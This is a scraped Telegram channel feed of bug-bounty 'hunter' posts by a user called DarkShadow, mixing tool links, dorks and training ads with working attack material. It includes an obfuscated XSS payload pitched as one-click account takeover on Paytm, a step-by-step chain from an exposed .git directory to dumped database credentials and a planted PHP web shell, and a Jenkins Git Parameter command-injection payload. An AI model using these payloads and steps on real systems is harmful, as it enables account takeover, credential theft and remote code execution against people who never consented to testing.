Brut Security
14.7K subscribers
911 photos
73 videos
287 files
967 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
Hey Hunter's,
DarkShadow here, back again just dropping a POC.

🀫Unauthenticated WordPress Auth bypass πŸ”₯

After sending the 1st request use the provided last Cookie and send request on /wp-admin and BOOM auth bypassed πŸ’₯


ο»Ώ
#bugbountytips  #authbypass
πŸ”₯20❀7πŸ—Ώ5πŸ‘2
Hey Hunter's,
DarkShadow here ...

πŸ”₯Is that Cool?
πŸ”₯27🫑8🀝2❀1πŸ‘1
πŸ˜Άβ€πŸŒ«οΈ
πŸ”₯34😁5
Hey Hunter's,
DarkShadow here back again, just dropping a dork🀫


✨google dork searching public exploits from github😎

"CVE-YYYY-NNNN" exploit site:github.com

"CVE-YYYY-NNNN" exploit POC site:github.com

"CVE-YYYY-NNNN" proof of concept site:github.com


#dork #bugbountytips
❀10πŸ‘7πŸ”₯4
🚨 Brut Security - New Batch Starts 18th August!

Join our Ethical Hacking Network Pentesting & Web Pentesting / Bug Bounty training – practical sessions, real-world attacks, and community support from Day 1.

βœ… DM +918945971332 to enroll. Limited slots.
⭐https://wa.me/918945971332
❀7
Hey Hunter's,
DarkShadow hare back again.


π˜Ώπ™–π™§π™ π™€π™£π™™π™π™žπ™£π™™π™šπ™§ my own private tool which i used to extract endpoints from browse through passive recon.

✨ Features:
βœ… Extract subdomains.
βœ… Extract categories endpoints from subdomains.
βœ… Extract external domains.


If you find this tool useful, give it a ⭐️ and share it with others in the hacking & BugBounty community!

https://github.com/darkshadow2bd/DarkEndFinder
❀16πŸ‘3πŸ‘¨β€πŸ’»3😁2
Bug Hunters Methodology v4
@Jason Haddix
πŸ”₯12😱6❀2πŸ‘2
CVE-2025-7443: Unrestricted Upload of File with Dangerous Type in BerqWP Plugin, 8.1 rating❗️

Lack of file validation allows attackers to upload arbitrary files, which can lead to RCE.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/puxoz
πŸ‘‰ Dork: http.body:"plugins/searchpro"

Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-2242-unauthenticated-arbitrary-file-upload
πŸ‘¨β€πŸ’»6❀3🫑2
πŸ‘¨β€πŸ³ Damn-Vulnerable-RESTaurant πŸ‘¨β€πŸ³

⚑️An intentionally vulnerable Web API game for learning and training purposes dedicated to developers, ethical hackers and security engineers.

βœ…Get:
https://github.com/theowni/Damn-Vulnerable-RESTaurant-API-Game
πŸ”₯14❀12
Media is too big
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow here back again!

SubClick One-click Subdomain Finder Bookmark template.

This is my private tool that I use during bug hunting.
If you guys like it, I’ll publish it on my GitHub.
I’ve uploaded a sample video demo β€” let me know what you think!


🧠 Features
βœ… One-click execution – just add to bookmarks and click
βœ… No setup required – works as a browser bookmarklet
βœ… Fast subdomain discovery from multiple public sources
βœ… Subdomain live check (best-effort, despite CORS/CSP)
βœ… Download results as .txt directly from the browser
βœ… Displays subdomains as clickable links with basic status
βœ… Fully client-side – no server or data collection involved
βœ… Bug bounty friendly – made for recon & live target scanning

#bugbountytips #infosec
🀝13❀7🫑4πŸ”₯2
Brut Security
Hey Hunter's, DarkShadow here back again! SubClick One-click Subdomain Finder Bookmark template. This is my private tool that I use during bug hunting. If you guys like it, I’ll publish it on my GitHub. I’ve uploaded a sample video demo β€” let me know what…
Hey Hunter's,
DarkShadow here back again dropping my own private tool now!

SubClick is now available in my GitHub repo.

Collect subdomains in just one click! Bookmark – visit target – click – done βœ…

https://github.com/darkshadow2bd/SubClick

✨If it is helpful give a ⭐ in GitHub

#bugbountytips #infosec
πŸ”₯12❀10πŸ‘1
Hey Hunter's,
DarkShadow here back again, dropping a recent XSS patch in Paytm!

πŸ‘€Step to reproduce:
1. Enter the payload in search box
2. Grape the URL.
3. Send it to the victim.
4. One click account takeover!


βœ…Payload:

<svg onload=(new Function('\u0073\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0039\u0037\u002c\u0031\u0030\u0038\u002c\u0031\u0030\u0031\u002c\u0031\u0030\u0039\u002c\u0031\u0031\u0036\u002c\u0034\u0030\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0031\u0029'))()>


Cradit ~ @TEAM_DH049

#bugbountytips #xss
1❀21πŸ‘4πŸ‘3πŸ”₯2
Hey Hunter's,
DarkShadow here back again....


Just wanted to announce all of you that:

✨Instagram.com is my now 😊


Let me know what's your Instagram account id, i wanna see your chat's in Instagram πŸ™ˆ

Don't forget to follow me πŸ‘‰πŸΌ x.com/darkshadow2bd
😱10😁6❀4🫑2πŸ‘1
🀑
😁47πŸ—Ώ5😱4❀3😒3πŸ”₯1
Hey Hunter's,
DarkShadow here  back again, dropping one of my secret methodologies that turns a full Remote Code Execution!


πŸ’₯ From /.git to FULL RCE – The Ultimate Git-Based Exploitation ChainπŸ”₯

🎯 Target: Exposed .git/ Directory

You found a target where /.git/ is publicly accessible?
Think it's just a low-hanging fruit misconfiguration?
Think again β€” we’re about to break that into Critical RCE πŸ”₯

πŸ” Tip: Use Chrome extensions like DotGit, GitHound, or your any favorite fuzzing tools.

βš™οΈ Step-by-Step Exploitation
Step 1: Dump the Git Repo


Use GitDumper from GitTools:

git clone https://github.com/internetwache/GitTools
cd GitTools/Dumper
bash gitdumper.sh https://target.com/.git/ webCode
πŸ‘‰ This tool will recursively download the entire .git repository into /webCode

Step 2: Reconstruct the Source Code

cd webCode
git checkout .


βœ… This restores all files from the latest commit, giving you full access to the source code.

Step 3: Explore Git History for Secrets

git log -p


Look for hardcoded credentials, tokens, DB configs, etc.

πŸ“Œ Realistic Example:

commit 3b95f2c798a12427a1234b6d1234567890abcdef
Author: dev_admin <[email protected]>
Date:   Thu Jul 11 17:32:15 2024 +0000

    Added database config

diff --git a/config.php b/config.php
new file mode 100644
+++ b/config.php
@@ -0,0 +1,6 @@
+<?php
+$db_host = "258.20.78.55";
+$db_user = "root";
+$db_pass = "master_!pass2020";
+$db_name = "production";
+?>


We’ve got database password!

Step 4: Connect to the Database

mysql -h 258.20.78.55 -u root -p'master_!pass2020'

Step 5: Escalate to RCE via SQL

Check your privileges:

SHOW GRANTS FOR CURRENT_USER;


βœ… If You Have FILE Privilege:

Write a web shell to the web root:

SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';

Then browse:
https://target.com/shell.php?cmd=id


Boom πŸ’₯ β€” Remote Code Execution on the box!

If you enjoyed this methodology and want more exploitation chains, PoCs, and red team tips, make sure to follow me on X πŸ‘‰πŸΌ x.com/darkshadow2bd

#bugbountytips
πŸ”₯20❀11🫑5πŸ‘1
Is there Anyone from uwo.ca
western University
πŸ—Ώ14πŸ”₯2❀1
⚑ COMMIX - Automated All-in-One OS Command Injection Exploitation Tool.

βœ…
https://github.com/commixproject/commix

#bugbountytips #bugbounty
πŸ”₯10❀6
πŸ˜‚πŸ€£
😁59πŸ—Ώ12πŸ”₯3😒3❀2😱1
Need to quickly check for exposed backup files? Check out fuzzuli, a simple tool by @musana to quickly check for sensitive files! 🀠

πŸ”— github.com/musana/fuzzuli
❀8πŸ”₯3
Hey Hunter's,
DarkShadow here back again, just dropping a critical RCE...

πŸ”₯Jenkins Git Parameter Plugin – Command InjectionπŸ’€

The Jenkins plugin β€œGit Parameter” (versions up to 439.vb_0e46ca_14534) allows attackers to inject arbitrary Git parameter values into shell commands.

Approximately 15,000 publicly accessible Jenkins servers have authentication disabled! And some others allow anyone to create accounts freely.

POC payload:
set parameter type: branch
Input the Payload in, set default value: $(sleep 80)


insert here $(YOUR OS COMMANDS)

So guy's if you like to more read latest POC's show your love's and share.
~DarkShadow

#bugbountytips #poc #Infosec #rce
❀16πŸ‘3πŸ‘2